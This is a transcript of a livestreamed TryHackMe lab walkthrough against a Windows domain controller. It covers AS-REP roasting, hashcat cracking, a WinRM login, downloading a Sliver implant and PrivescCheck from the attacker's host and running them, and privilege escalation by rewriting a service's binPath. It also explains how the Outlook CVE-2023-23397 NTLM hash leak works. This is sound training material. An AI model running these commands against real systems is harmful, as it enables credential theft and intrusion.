What's up, hackers? Welcome to TTI Live. My name is Taggart. Hello, Rasta. Good to see you. I still need to take my exam. That's actually kind of what this is about. So, I'm going to be honest with y'all. After the last week of JavaScript for Hackers, I am lesson planned out. So, I know that, like, the last thing on my list, I have this long list of things, like, to do before baby is born. And I've mostly crossed all of them off the list, except one of them is obtain CRTO. And so Windows stuff is really not my sweet spot. As you know, I'm a web app guy, but I'm still trying to practice and trying to diversify my practice as much as possible. And so I did see that there were a couple of new Windows rooms in TryHackMe, so I thought, let's give it a go today. So that's the plan, but also feel free to consider this kind of an AMA. This is one of the rare occasions in which I am totally fine being derailed. Okay, so feel free to ask questions that are completely off topic. I am opening that door. That's all right. It's the first warm day that we've had in a while here in Los Angeles, and I'm feeling great. So we're just gonna have a good time for a couple hours. That's the plan. If that's cool with you, let's get into it. I do have this room here in TryHackMe set up. This is services. I think it's one of the newer ones. And we kind of know based on the name what it's going to be about. It's rated as a medium. We'll see. And because I like not wasting your time, I've already done the initial fingerprinting. So plainly, we have ourselves not just a Windows machine, but a domain controller here. And we do have ourselves a domain name, services.local, very original. We've got LDAP running, we've got LDAP-S running, and 445, obviously, RDP. Don't give Rasta a hard time about CRTO 3. The madding crowds, Rasta, they're never satisfied, are they? What Nmap command did I run? That is a great question, and the answer is I didn't. Well, not really. So my enumeration begins with rust scan, and the reason I used rust scan is because it's faster. What it does is does a quick TCP hit on all of the ports, and then for anything that it discovers, it will then pass those over to Nmap with the flags that you give it. So here we have, and I'm actually running rust scan slowly. You can kick this up to a much higher thread pool, but I run it slowly because I don't want to kill my NIC. One of the things with rust scan is so fast, and this is also true of Ferox Buster, they're so fast that you can flood your own NIC, right? And you don't want to do that because then you're actually going slower when you do that. You want to find the sweet spot between software speed and real throughput. And so the 200 works for me. You can find out what works for you. And then we're targeting a single address, and then this dash, right, is basically the divider between arguments to rust scan and the arguments that will be passed over to Nmap. And I'm just doing a simple syn scan. I'm doing A for all fingerprinting, or run all scripts, and then I'm outputting to nmap.txt, which is what you were just seeing. So it's not the most original. It's certainly not the stealthiest. I could run this a lot of different ways, but my job right now is to get information, not to be stealthy. All right, so, we have WinRM open. That's interesting. And a couple of weirdos, 7680, 9389. And then, okay, for those of you who are not used to looking at Windows machines, often you will see these super high, in the 49s and the 50s, TCP ports for MSRPC, and it'd be like, I wonder if those are attackable. Don't sweat those too much. Basically, what's going on is for all of the kind of ad hoc RPC work that Windows does between a domain member and a domain controller, or between just actually machines on a network, right? Often, those conversations will take place over arbitrary high number TCP ports that'll just get opened and closed during the normal operation of Windows. This is documented. We actually put it in WTF bins because for new analysts and for new pen testers, you might look at it and be like, "Oh, that's weird. I should do something with that." It's not. It's part of normal operation. But the first time you see it, it's unexpected, right? And that's what we do with WTF bins. But we do have WinRM open. We have a domain, right? We have services.local. Oh, and we do have a web server, and it actually appears to have a real site on it called Above Services. It's not the IIS default page. So, if you're telling me that I have a website on this Windows pen test, then I'm a happy camper. Let's crack open Zap, and we'll crack open our pen test profile in Vivaldi. I'm all in on Vivaldi, by the way. I'm very happy with it as a replacement for Brave. Come on, Zap. You can do it. Oh, by the way, so since we're here... Hey, Lara and Kingy, thank you so much for that follow. Paco, welcome. So this is kind of a cool thing that I realized, and I don't know why I never thought of this before. Yeah, we don't need to persist the session. So one of the cool things in Burp is the extension to look for things like prototype pollution. And if I want to still use Zap, but I want the sweetness of that extension, it is possible to get it. And again, I don't know why I never thought about this. But if I... Let me show you how to do that real quickly. If you want that cool Burp Suite extension, what's it called? DOM attack or whatever? We'll find out in a second. Here's how you get it. Let's see. ls user share burp, right? DOM Invader. Thanks, Just a Guy. Exactly. If you want DOM Invader without all of burp, then here's how you get it. So in user share burp suite, there's just burpsuite.jar, right? So let's make a dir burp because my downloads folder's a little messy. cd into burp. And then cp user share burp suite.jar in here. And guess what? Jars are just zip files. So that might take a second because it's not small. Who's Dom? Dom's the guy. If you don't know Dom, I can't help you. Yeah, jars are just zip files, so we can unzip, not zip, unzip burpsuite.jar. And if we go to, I think it's in resources, browser, Chromium extension, it's right there. So we can just like, if we cp rf resources, browser, Chromium extension, and I'm just going to drop it in scripts, DOM Invader, just make it that folder. And then in my pentest profile here, nope. There we go, Control-Shift-D to get my extensions. Let me enable, developer mode's open, of course, because I was testing some extensions. Let me load unpacked, go to my scripts, go to DOM Invader, and call it a day. And hey, look, now I have the extension without using Burp Suite. And it's pretty handy. Now it'll yell about a manifest version, but don't sweat that. Just, they'll have to figure out how to use MV3 at some point, but for now it's all right. And yeah, it's right here. And if you want to get rid of this warning, just allow it in incognito mode. But yeah, now this thing will actually run if you want it to. And it'll, you know, it doesn't, the DOM invader doesn't work directly with the proxy anyway. So, like, you're good. You can just have this. Thanks, Portswigger. Anyway, where are we actually going? Yeah, none of this is correct. Let's go to our actual TryHackMe IP address. Beautiful. The best educational template. Well, fantastic. Collage education? Oh no. All right. So this is a little bit of OSINT, basically. We have a user here, services.local. Thanks so much. So j.do. So we have a user here. Let's go back to our TryHackMe. It's vim users.txt. Okay, we know that we have a j.do. Just like, there are name generators. Use them so that you don't have to rely on your own name guessing. Or, I swear, so if I ever do a TryHackMe room, I am going to have to create usernames based on that Japanese baseball game. We all know about Sleeve McDykel, right? Yeah. These will be my users in my domain. Sleeve McDykel, domain admin. Bobson Dugnut. Okay, so j.do. What else we got on here? Is there an about us? There is an about us. We are an awesome team! Didn't need to all caps that. Also, another pro tip for all you web designers out there, don't use lorem ipsum. Use Jeffsum. You can just get random Jeff Goldblum quotes and fill your template with that. Obviously superior. Okay, Joanne Doe. Jack Rock. Will Masters. Johnny LaRusso. None of these people look trustworthy. Okay. Rock. What was it? Will Masters. And Johnny LaRusso. Okay. We got some users. You can probably just get ChatGPT to write you half the story on a box. I don't want to do that. ChatGPT, here's what I've used it for in the last week. Like some PowerShell syntax that I was blanking on. But I'm really worried about what should be human material getting produced by ChatGPT. I'm worried enough about it that I wrote a 5,000-word essay on it. That I'm now going to inflict upon you. I won't read it out in full, but I will link you to it because I felt strongly enough about it. It merited this kind of response. We're at the precipice. People who are saying like, "Oh, AI is going to take over," they're worried about the wrong thing. We're not about to have a Terminator situation, right? We're not about to have a Matrix situation. That's insane. But what we are about to have is an economic upheaval. And more perhaps alarmingly is we're about to enter a situation in which most of the text, to say nothing of voice or video, but we're about to enter a situation in which the text that we consume, most of the text that we consume, we will not be able to know whether it was synthetically created or created by a person, and that person having specific intentions and meanings behind what they are trying to say, as opposed to large language models who have neither meaning nor intent. They cannot have those things. And so that materially changes the nature of what we're consuming. And it also puts truth, like the idea of truth, on the auction block. Because in order for something to feel true to you, you have to have like an understanding of my intentions in what I'm communicating. There's like other channels other than the words that I'm saying. And that's not present with ChatGPT. The Turing test is a garbage test for sentience. It's a garbage test. And actually, I go into that in the essay, why John Searle's Chinese room is a great experiment as to why the Turing test is a garbage test for generalized intelligence. How do we even know if you're real? I promise I don't know if I'm real. But assuming that I am has been working so far, so hooray! Welcome to Epistemology Chat here on Twitch.tv. All right. We've got some users, and I guess I can try. I don't have any credentials yet, but I guess I can try something like SMB client with no username and password just to see if it works, you know? We'll start there. Yeah, we'll do that. CMP? What do you mean by what is CMP? I think my next step is probably going to be something like Kerberos, right? CrackMapExec. Kerberos first, and then we'll go to CME. Because again, with CrackMapExec is best when you have credentials, right? But I need to find, because I can't enum shares. Like I could try it. That's totally fair. And do CME SMB to the IP address, username blank, password blank, and just to see if I can like enum shares or anything like that. But the truth is, that's going to be pretty rare. Yeah. So what I want to do is see if any of the Kerberos stuff is going to work out for me. Or guest account. Yeah, it's possible. Yeah, session deleted. So I'm feeling pretty good about this. So what we want to do is user enum with Kerberos, right? DC, and then user enum. It's been a while since I've done this, so what do I want? User enum, and then just the words list. Yeah, so we'll just do users.t. Let's see, DC, and then users.txt. Oh, my bad. Domain services.local. Nice. So we know that those are valid. Yeah, we want to basically, we want to see if there's any pre-auth. which I'm blanking on right now. Because we still need credentials one way or another. All right, KaliLinuxTutorials.com. Give that a shot. To enumerate usernames, Kerberos sends TGP with no pre-authentication. Usernames principal unknown. Yeah, so we didn't get any pre-auth, I guess. Which is unfortunate. I suppose we can do... Did I run Ferox Buster for hidden directories? No, I didn't. This is a Windows thing, but I guess we can do enumeration. I'm trying to follow down what I have here, and then we'll go back. Yeah. We can run Ferox Buster. That's fine. Ferox Buster. Yeah, that looks pretty good. We'll do that. So, breakdown of this Ferox Buster command. The URL is this. Our word list is our directory list 23 medium. Actually, that could be lowercase. Lowercase 23 medium. Yeah. We're limiting 15 and 15. By the way, if you want to know how many concurrent requests are going to be made by Ferox Buster at any one time, if you do the limit and the threads, it's L times T. That's how many concurrent requests are actually going to be happening. Oh, dang it. It's all right. I should have set it to not recurse, but it's okay. Might as well check robots.txt too, right? Oh, wild. That's interesting. So Vivaldi doesn't do a robots.txt search, but Brave did. That's kind of cool to know. Yeah, no such thing, though. And by the way, because we turned on the burp replay, all of the stuff that Ferox Buster is finding is getting added here. Yeah, I'm not seeing anything particularly special there. Okay. We don't appear to have any pre-auth. The web thing isn't going to give us too much. I guess we can brute some passwords. It's annoying, but I guess we can do it. You know? I really don't like that idea, but I suppose it's possible. Unless, is there another impacket thing that we can do? At this point, I don't think so. All right. Well, we'll try that. So we can do this with either Kerberos or with CrackMapExec. But Kerberos written in Go, I think, is going to be a little faster for us. Root user. Only run this if you're sure there's no lockout policy, which we don't know. So I'd rather not run that, if not. If not sure, because we haven't been able to enumerate the password policy yet, you know? But we want ASREP. Get NP users. Do I not have that? I do. Okay. Thanks, Orbital. So I'm going to say this right now, chat. Like, feel free to drop recommendations. Don't take it personally if I don't take you up on them. I've got a thing that I'm, like, trying to go down. Looks like NP users is the direction I want to go right now. Yeah. So it's going to look a little bit like get NP users. And it's in packet, so it should be pretty much the target, which I guess we'll do these in turn. j.larusso at services.local. Start. Or actually, it's going to be... This in-packet syntax is always funny. DC IP is going to be there. And we want the... Oh, actually, hold on. We've got a users file. Never mind. Users file. Users.txt. Lovely. And also we'll do the format for hashcat. And then we'll do output file asrep.hash. Target. Let's replace DCIP with target. Oh, it's positional. Domain should be specified. Of course it should be. Domain. Oh, hold on a second. Target should be... Yeah, okay. So the target is services.local and then the DC-IP. This is indeed ASREP roasting. Domain should be specified. I thought I did that. Let me check the example. I think domain is first. You are 100% correct. Yes. Oh, in packet syntax. You're so crazy. Boy, that slash did the job. User JDo doesn't... So we got 3 back. Oh, ho, ho! J-Rock, we got ourselves a hash here. Okay. Now, am I crazy, or do we need to remove... We need to remove the 23 for this. In order to make this work, right? I believe. In Packet never heard of position independent arguments. I mean, it did, though. Right? Yeah. And then I always forget the hashcat format, but I think this is going to tell us what it is right here. Oh, no, they're using hashcat. It's fine. We'll do hashcat, help, grep. Actually, perfect. Plainly, I've done this before. Yes. It's 18200 is what we wanted. So we want hashcat A0 M18200, and we'll give it the asrep.hash, and then we will give it user share. Actually, no. Scripts, seclists. What? Seclists, passwords, leak databases, rocku.txt. The huge. Let that crack for a second. We'll see what happens. I should have run the -O option for hashcat as well to optimize it for my little baby VM here. Oh, great. Done. Service works 1. Okay, and that was for JRock. So let's over here, let's vim creds.txt. Okay, we've got j.rock and service works 1. Cool. Now I will use CrackMapExec SMB against our IP address. You know what I really should start doing? And I don't know why I never thought about this before. I should start saving whatever my target is as an environment variable so that I can just use it. He says, proceeding to not do that. Okay, so now we know j.rock. He is service works 1, and our domain is gonna be services.local. What you got for me? Oh, yes. We have read write to C. Not to admin, but that... Well, we'll see what that does for us. By the way... There's a little trick that I picked up from the Hack the Box Academy stuff in for Windows. I have to say, so I haven't really had a chance to look at the Hack the Box Academy material until just recently. And it kind of rules. At least the stuff that I've been looking at is some of the best written material that I have seen. It's written the Windows module, at least that I'm doing, that goes like from enumeration through Kerberos exploitation, is written first person from the perspective of a pen tester, and like the writer is sharing some of their experiences as they're walking you through the procedure. It's great. It's really well done. The lab experience looks good. The layout is all right. Yeah, I'm really happy with it. And the pricing is admittedly strange. So basically, if you're not a student, it's, what is it, like $18 US monthly, and you get, for that level, you get 200 cubes, or no, 500 cubes a month to use on modules. So all modules have a specific ad hoc currency cost. It's like freemium, really. But then what you could do if you wanted, like if there was a specific module that you knew that you wanted to do, but you didn't want to commit to a monthly thing, you can like pay $20 for a certain amount of cubes, and then you could just go do that module, which is what I did for this Windows thing. I was like, I don't want to commit to a monthly subscription, but I'll pay $20 once and get the cubes necessary to do this thing. And it's great. I think that if you have like targeted goals, that's a pretty reasonable way to go. Especially because the material is high enough quality to justify that level of purchase. The lifetime access to modules is also a plus. Yeah, for sure. No, so you can't stream that stuff, obviously, so you'll never see it here, but I'm very happy with it as a learning platform. Really solid. I haven't done any of the web stuff. I feel good on my web capabilities, but it's really, I think, worth at least checking out. All right, so yeah, the password policy, this is kind of a cool thing. I think you can stream their tier 0 courses. Well, okay. That's kind of not where we are at, though, right? Min password length. So this is default, right? Min password length 7, password history length 24. I mean, Hack the Box is funny about their policies with streaming, too. Like, you were technically, I mean, not technically, you were forbidden from streaming live boxes. People did anyway, but yeah, you were not supposed to do that. Only retired boxes. Reset account locker. Yeah, this is all default for the password policy. Okay, so we have a couple of options now. Probably the easiest is WinRM. But I actually want to try something a little different, if you'll indulge me. So one of the things we can do with CrackMapExec is we can put files. So let's look at our payloads here. Let's fire up Sliver. Sliver's not running. And I can't type my sudo password. There we go. Okay. What'd you got for me? Yeah. This is all good. This is a service binary. The Academy stuff, because it's the only course I've actually seen teach you how to write a report. Killer. For Windows, I'll grant you that. The whole last part of PWST is about web app reporting, though. I make a very specific point about teaching you how to do that. That's good, though. I mean, I would argue that's a sign of quality. What do I have in my actual payloads here? thmsliv.exe. Perfect. So I'm going to put that file on the box. I just want to see if this works. Let's run our MTLS listener. And then I want to put file. And then it's like source destination, right? So payloads, thmsliv.exe. And then we're going to put it at C program data, thmsliv.exe. Let's see if this works. Maybe? Let me run put file without any arguments to see if that actually did anything. Expected 2 arguments, source test. So in theory, that just ran. And what I'm going to do now is now execute it with the -x command. And let's see if I get a talkback. No. I don't think it actually uploaded because I didn't get a success. But, you know... Oh, you know what? It may need absolute paths. Might not do relatives. This is services, noob. All right, put file isn't working. Let's just run a simple x who am I, just to see if this works at all. And I may not be able to do this because I don't have right on the admin. Yeah. All right, but let's see if I have WinRM privs. Yeah, but no, like, WinRM, you should only... I think we're missing a step because we need another... This user is able to, like, auth to the machine. We have read to C, which means... I can also enumerate users, which I don't know why I didn't think about that before. Okay. Well, we knew that there was going to be... So, LaRusso, Masters, Doe, Rock, we knew about those. KRBTGT, obviously. We might as well try to get SPNs. And it'll be, yeah, services, .local, we'll use j.rock, DC, IP, this guy. User domain should be specified. I've done this a million times. Why am I not getting this right? Domain username. Oh, services.local/j.rock. Okay. And then, yeah, we put in the password. No entries found. All right. So proper Kerberoasting is not happening. We'll try to auth with WinRM. I don't think it's going to happen, though. That's not the right username. J.rock is the right username. There we go. Oh, all right. That's funny. I was under the impression that not having right to the admin meant you were not local admin, but I guess not. Or it was just added separately. Okay. Got a nice little PowerShell here. All right, there's our user flag. ASRAP roasting indeed. All right, it's for our first flag. Well, the room is called services. You don't need local admin for WinRM. So you don't need, that is true. You don't need local admin for WinRM. You have to be added to, well, you need to be added to like remote management users. That's the group. There's a specific group that you need to be in. Yeah. Right. So remote management users, you're in. And the reason, here's the difference, at least as I understand it. And PS remoting does require local admin. Yeah. And here's the difference. When you do PS remoting, you are automatically dropped into a high integrity session. So you have to be a local admin in order for that to make any sense. But WinRM doesn't do that. WinRM drops you into, as you can see, we're in a medium integrity, right? So we don't have an admin token right now. Hey, Angel. Wow, long time no see, buddy. Hope you're well. And general on Twitch. I get it. All right, so am I anything else special? Server operators. All right. We would be remiss not to enumerate services. And yeah, I'm going to do this PowerShell style first. What? Can I open service control? Wow. So you can, in theory, you can enumerate services otherwise. Every time. Oh, wow. Wow. But wait. So let's see. I'm in a medium integrity, but I'm in remote management users. I'm in server operators. I feel like I should be able to elevate to admin. I just don't have it here. So we're talking about privilege escalation here, I guess. Or are we? I mean, easy days would be to fire up PowerView, right? Yes, I do have it. Okay. There's PowerView. Let's see how this is going to go.
Baby, your gun doesn't work on me. Now where is the mask?
13,696. Oh, wait, you know what? Before I do this. What are we fighting against here? I don't have the ability to do much. I feel like this is more limited than it should be, because like even in a non-admin session on my regular computer, I can run get MP computer status. You know? So something else is going on here. I think what I'm gonna do is use Evil WinRM to upload home taggart payloads THM sliv.exe. Good lord. Okay, never mind. No, we're not. We're gonna run, yeah, rm thm sliv.exe. Yeah, we're not doing that. Instead, we're gonna use its own thing to pull it down. So, IWR, just do wget 10.13.6.96, 8443. thm sliv.exe, thm.exe. Great. Where's that dial-up sound coming from? For real. Okay. Hey, we got ourselves a sliver session. All right. All right, I'm still in a medium session, but my hope is that this situation is going to be a little bit more stable. It might not be. By the way, one of the nice things about Sliver is I have my armory packages here. Including Sharp Up. Yeah, Sharp Up bought it. Yes, Welzy. Thank you so much for that follow. Not vulnerable to any of the 15 check modules. Interesting. You'd think that the box name services would have services exploit. I believe that to be true, but for whatever reason, I wasn't able to read the services, right? All right, let's pop in here. Let's just see if PowerShell on this thing runs better. Whoa. That's not what I typed, but okay. Sorry. One thing I really wish they would add to Sliver is the ability to do up arrows. Maybe the box creator is forcing people to use, dare I say it, manual enumeration. What? That's what I'm doing! I'm doing manual enumeration! But for whatever reason, what do they want me to do? They wanted me to look in the registry. We can do it. Get item, registry, HK, LM, what is it? Windows current control set. I'm gonna have to look it up. I was just looking at this yesterday. Windows registry services. I know it's in current control set. I can't remember if it's like down software first. System, current control set, services. That's what I want. System, current control set, services. Okay. What do I want? I want get child item, right? Yeah. Cool. So helpful. You know what? Can I WinRM to this thing? Or can I RDP to this thing? J.Rock. I forgot to put it in the domain. Nah. Okay. I wasn't in remote desktop users. That's right. Okay. So here we are. So this is nasty, but oh my god. Get child item. See, I want to be able to go back up to my last command, and I can't do it. Registry. HKLM. System. Current control set. Services. Select name. There we go. All right. See if there's anything that looks immediately funky here. My terminal looks sick. Thanks. It's not special. It's just Tmux. I guess we can run access check on some of these to see if they're interesting. There's a lot. This is like a lot of random services. This is intentionally messy. Do they like specifically want me to run WinPs on this? The default color is green. Is it access check time? That's what I'm thinking. Is it Windows like this on pen tests? I mean, or some more open ports. Not really. So like there's a reasonable set here. Let's take a look at my machine and see what services are running on it. And again, may I remind you that this is non-elevated. I can just run this and it'll give me get service and PowerShell. It's so nice, right? So like there's a limited set here. And it's not a short list. But anything that we saw here that looks bizarre, you know, we can compare one to the other. We can actually start at the top. Now, it's not going to be a one-to-one, obviously, because this is a server, different operating systems. Nevertheless, right? Yeah, ACPI dev. That Brave service has got to go. I don't even use Brave anymore. Yeah. I think it's just time to go get access check. So, which I insanely don't have right now, I don't think, in scripts. Yeah. Access check. So access check is part of sysinternals. It's one of my favorites. Why did this go weird? Yeah, it's part of sysinternals. So if we go to live.sysinternals.com, we can just go get it. Yeah, we'll drop that in scripts, sysinternals. Very handy. So, okay, well, let me show you. When we... I should have run that while I was still in PowerShell. But get ACL. Will give you some insane things to read. So, for example, or even get service. Let's just try like WLAN service. There's a way to get the descriptor. But even if we do like C Windows System 32, right? Yeah, there we go. That's what I wanted to see. This is the security descriptor, and there are wizards who can read this thing, but you don't have to with access check. With access check, it'll turn this into like more sane. It'll look like this, but it'll look like that for services. So access check is a great tool for exactly this. So we're gonna upload it. We're gonna upload scripts. Sysinternals. Access. I can't spell today. Maybe I just can't spell. 64.exe. Nice. Okay. So what's cool about access check is we'll go into our shell here. Once again, yes, I'm an adult. Access. No, of course I don't get autocomplete. Accept EULA. And then there's a way to get just like all services. what is it, like... How hard would it be to add autocomplete to subshell within a framework? I don't know, but I do know why you don't want to do it. Because every time you do that, you're producing PowerShell events. So it is actually OPSEC dangerous unless you have a separate like console history that you're doing for that. I don't think that would be particularly fun. Yeah, there we go. I want -C star. So we're going to run access check 64.exe accept EULA C star. We can't even run it because the access is denied, because we can't open the service control manager. This thing is locked down. We are missing a step here. Dang. All right. Well, I actually despise running WinPs in Sliver. It's so nasty. Can you do it from the registry key? So we can maybe. That's a fair point. Mr. PC fix it. Yeah. K, and then I gotta give it the registry key. Yeah. Right, thank you. But that's the thing, hold on. Like, we can just intuitively know, we have to do that for each service, right? So, we actually want to, okay, we can PowerShell this a little bit. We can do this. We can do this. You're gonna love this. For each. And then we're gonna do, it's actually not that terrible. Yep, that's exactly what we're doing. Access check 64.exe accept EULA -k dot name. God, that's annoying. Oh my god. All right, well, we're going to have to save that to a file and read it. I didn't lose the command. I still have it. That's why I use tmux. Check this out. I had to go find the beginning of the script, but I've got more than enough scroll history here. Yeah, come on. There it is. Okay. tmux with the tmux yank. Boom. Can you set the scroll history? Yes, you can. But also, so with Tmux Yank, I just have that now. And then we're going to output that to acs.text. Then we're going to download acs.text. BTWI Usarch. Great name. Thank you so much for that follow. You got me with that one. So what are we looking for? We want to see read-write. And there are some for server operators, which I'm in a group with. So that's actually great news, right? Any of these would be possible. Except... Yeah. Okay, so but this is the registry. So I can change the registry bin path for one of these things. I just have to pick one that has server operators read-write, yeah? Yeah. Any one of these will do. Oh, it recursed, too. I'm looking at this, it's like... Don't you need service restart permissions as well? Yes, that is true. So that's going to be tricky. Unless there's something that's stopped, in which case I only need to be able to start it. But either way, I'm going to need access to the SC manager, which... The service control manager. No, Killer's right. Either way, I need access to the service control manager, which I plainly don't have because I wasn't able to run sc.exe at all. Okay, that's doing its thing. Do I still have my WinRM shell? I do. Do I have access to this at all? I do. Okay, so... Let's just pick one service. XML prov. Okay. Okay. Enum query services open service failed. Here's the thing. Open service is the function. I don't have access to that. So there's a missing step here. Yeah, I think we're gonna have to... Is this done? Okay, cool. I think I want to try PrevEsc here. Just to see how this goes. Why is this not starred? Yeah. We're gonna go get this thing. And easiest way to do it that I know... I mean, we can just save this as PrevEsc, but, yeah, why not? Let's go put that in scripts. Get clone. That way we can pull it if we need to. Okay. And then over here in my C2, I'm going to CP scripts, PrevEsc, Preroll check PS1. Put it here. Python 3. And then here, we're going to do one of these. We're going to do local context wget 10.13.6.96 8443 / privesc check.ps1 invoke expression and yes, do that. That's not the right IP address, is it? Why can I never remember this thing? It's 1013, isn't it? Yup. All right, well, we'll wait for that to error out then. Beautiful. I might as well just rewrite this. So you get 10.13.6.96 96 8443 priv. Wow. Privesc check.ps1 invoke expression. And actually, I might as well just do invoke privesc check. Do I have the case right on that? Yes. Dang it. And I can't go back. I have to type everything perfectly. Privesc check dot ps1 iex invoke priv check. Uh-oh. Web commandlet. Invoke privesc does not recognize the name of a commandlet function script file. Oh, I gotta use basic parsing. Oh, God. Fine. Okay, here we go again. 10.13.6.96 8443. So many little things. Privesc check.ps1. Moment of appreciation for the gunship track. Well, I'm sorry, it's a Laserhawk track featuring gunship. You're new to coding, Depends, and this looks interesting to you? This is a totally different animal from software development. As a former developer, I can tell you that for sure. Use basic parsing. IEX. And then invoke privesc check. There we go. Let's see what we have here. Quite a bit. Probably should have saved this to a file for us to review. Okay. That's right, we're in server operators, that we knew. What's the environment variables of the current process try to define? Yeah, no environment variables, non-default services. Okay, so this is nice. There are 4 non-default services. The CloudFormation, Start mode manual, SSH agent, AWS Lite, Amazon. They're okay. I mean, the truth is they're non-default, but they're actually totally normal on an Amazon machine, an AWS machine. Service permissions. All right. Yo, what are we doing here? Because we've got status stopped, user can start, user can stop for like all of these, right? I don't understand the problem then. Okay, let's just take like one of these. Oh, this is a driver. I don't want a driver. Okay, let's take user can start, user can stop. Let's just take one of these and see if I can actually run this. Interesting. So, can I do it with PowerShell? Yes! Okay, so I always forget how to get the bin path off of sc.exe query. And what I remember is that you can't, the PowerShell get service commandlet won't show you the bin path. Like at all. You can only do this with sc.exe. Was it in the listing of services? So you can do it with registry, right? That's for sure possible. So if we do get child item registry, HKLM system, current control set, services, and then at the manager. What we will see is instances. Interesting. We do get item. What does it tell us? There it is. Once again, it's a .sys. I don't feel like writing a driver. Oh, yeah. But plainly this works. So just got to find an exe here. And then write that as a service binary, and then we're good to go. We're almost home. Boom. There it is. Okay. So we'll do alg, whatever that is. It's stopped, and we can start it. And so we're going to modify that thing. First things first. So alg is our target here. sc.exe query alg. Nice. Okay. So we have, I believe, let's exit out of this shell because we need to get back to Sliver. By the way, I use Arch. The reason I'm not commenting here is because I don't have the OSCP. All right, so our registry and service permissions are good. So I think we're solid here. So what we're gonna do, profiles, and one of them should be THM Win Service. Yes. And do I have? I do have that. So we're gonna upload. Where am I? Yeah, okay. We're gonna upload winserve.exe. And once that's uploaded, by the way, so why is it a service binary? Service binaries are structured slightly differently than regular PEs, regular Windows Portable Executables. So you have to make them slightly differently if you want to fire them up. Like you can do it technically with a regular one, but it's not as clean. So now we're gonna run sc.exe config alg bin path equals c users j.rock documents thm winserve.exe. Okay, sc.exe start. Actually, I'll do it with PowerShell just because we can. Start service alg. Nerds. Could not start service. Why? Open error. SC dot. Users JRock. Let's just try it with just thm.exe. Whatever. I'm not getting anything going here. All right. Well, there's always the cheap way. Right? Do I have that right? I don't know why, but no, it's slash. It's the other way. It's Windows syntax just does not stick in my head the way that Linux does. I don't know why that's true, but it is absolutely true. Okay. sc.exe start alg. Okay, so that failed, but did that do anything? You may need Command C. Maybe. This is just like, this service is not playing ball with me here at all. First of all, the WinServe thing should have worked. You messed net on that one. Hey, Rasta. Thanks. You are correct. That doesn't appear to be the issue, though. Something else is going on. Because, like, all the other bin path stuff, like... my sliver session should have worked. I think I'm going to try a different service. I don't know what, for whatever reason, this thing isn't playing ball, but I want to try a different service. Is the service actually running a system? No, it's running as local service. There was another one up there. Okay. Maybe ADWS? Because we know that thing's actually running. Oh yeah, let's break ADWS. That's fair. I could change the local... Interestingly, in the sc.exe scconfig documentation, it doesn't show that you can change the name, the user under which the server is running. I have, this is the server name, the service name. Oh, maybe it's the type, but that may change it, right? So. Or, yeah, type is own, runs its own process. Because what is this? It's, do we start? No, they're both Win32 owned processes, so that's not the distinguishing feature. Yeah. There we go, obj. There it is. The default setting is local system. So we're going to change it to local system. All right, we'll try that. Obj equals local system. Okay, let's see how that looks now. Okay. That's different. Hey, there it is. Thank you so much, Rasta. Use 7C. Oh, yeah. There it is. I have taken this course. I've actually taken this course like 2 or 3 times at this point in terms of going through it. Yeah, no, it's excellent material. Really, really fantastic stuff. If you've moved on beyond OSCP, if you've done that stuff and you're interested in offensive methodology. By the way, I should say this. I'm actually not by disposition a red teamer. I'm just not. My heart is with the blue team. And it's actually something I really appreciate about Rasta's course, that it has material for both offensive operators and defensive operators, because not only do you run the attacks, but in the labs, you actually spin up a sim, and you have to go find evidence of the attacks. It's really fantastic. It's approached very intelligently. So I really appreciate Rasta's work on that. Absolutely a treasure in the community. That's not a thing. Group.txt. Server operators. All right. That is that flag done and dusted. All right. I think I want to try... There was another room that on here that I saw that I wanted to play with. So we're going to kill our sessions here and stop this room and kind of move on to the next thing. That was fun, though. All right. The other thing, yeah... So I had a lot of fun with this at work, actually, which is CVE 2023-23397, also known as... Actually, it didn't get a cool name, did it? Let's come up with a cool name for this one. Dirty Invite. RSV Pwn. Bad Outlook. I don't know. It's kind of crazy. This vulnerability was an exploitation of extra options that you can set in the Outlook mail object. Wasn't this something where everyone was showing it needed to be manually triggered, but in fact it could be automatically triggered? Yeah, so I didn't go John Hammond on this, but I did do some research on this, and I found that the exploits that were getting demoed were not entirely correct. So all of the demos that you saw for this thing were actually doing local exploitation. Let's back up. So the way that this thing works is that it used a property of Outlook mail objects that could accept a UNC path, a path like to an SMB share. Excuse me. And so what you could do, that path, by the way, that option was for a custom reminder sound for the notification. Is this video recorded? Yes, it's recorded on Twitch, and then in 24 hours it will be on YouTube. So that sound could be loaded from a UNC path. I don't know why this option was set in the first place. And by the way, it was available in the comma object, but it wasn't necessarily available. Like, you couldn't do it just in Outlook. So it turned out that there were a couple of ways to make this happen. PowerShell was by far the easiest, and I think that's what we'll end up doing today, even if that's not what the box wants us to do. The demos that were from Trusted Sec, I think, and someplace else that kind of demoed this vulnerability, first of all, there were a couple of gotchas. One thing is that the demo they did was local, so meaning that they were running it off of Cobalt Strike or Nighthawk on a local machine, a machine they had already infected, right, or compromised. They opened Outlook on that same machine, ran the exploit from their C2 on the local machine, and then they got the hash back. And that's the danger of a UNC path, right? Because if you're doing NTLM authentication over an SMB share, Windows machines will just give up their NTLM2 hash. But all of the demos that I saw were that local exploitation system, which is like, okay, you send somebody an invite and then you get the hash. The danger that they were talking about, obviously, was if you allow SMB outbound, anybody could send you an email, right? And then all of a sudden you're collecting their NTLM2 hash over the internet. That was scary, but there was a scarier version of this. The scarier version of this was if you've already gotten into an environment and you know the target whose hash you want. So let's say, like, you know the domain admin who shouldn't be using email with their DA account, but let's leave that for, or let's say the CISO or whoever, right? You know the specific person whose credentials you want. From the compromised machine that you have, you can send that user directly an email And since you're already inside the same network, you don't have to worry about SMB outbound. You can just lay in the cut and with Inve or whatever, collect that hash right there. That, to me, was the scarier version of this vulnerability. And if you haven't updated your Outlook, it's still a concern. Now, this was local Outlook, right? The web app and 365 aren't impacted by this. All right, let's RDP into this thing and let's see what they have for us here. I'm gonna have to look up my exploit for this, I think, because I liked mine better. That was the other thing. So because this is an invite reminder, if you've ever had the misfortune of dealing with Outlook, you know that you'll get an invite for a pop-up reminder for meetings or any appointments that you have set, and that's kind of what they were using. But it turned out that you could actually make a reminder pop-up from a straight email. You didn't even have to send an invite. So there were a lot of different ways to do it, and in my testing, the only way that I could reliably get a remote user somewhere else on the network to trigger that SMB disclosure was using the email method, not the invite method. I tested this a lot, and the only ones I was able to get to trigger were the emails. So the demos that you saw that were local exploitation, I think they needed to go one step further and go target a remote host and show that. Because I think there's some other thing that was preventing that from happening. Okay. And what are we? Administrator, password 321. Cool. What in the world are we looking at here? Let's see what this PowerShell script looks like. 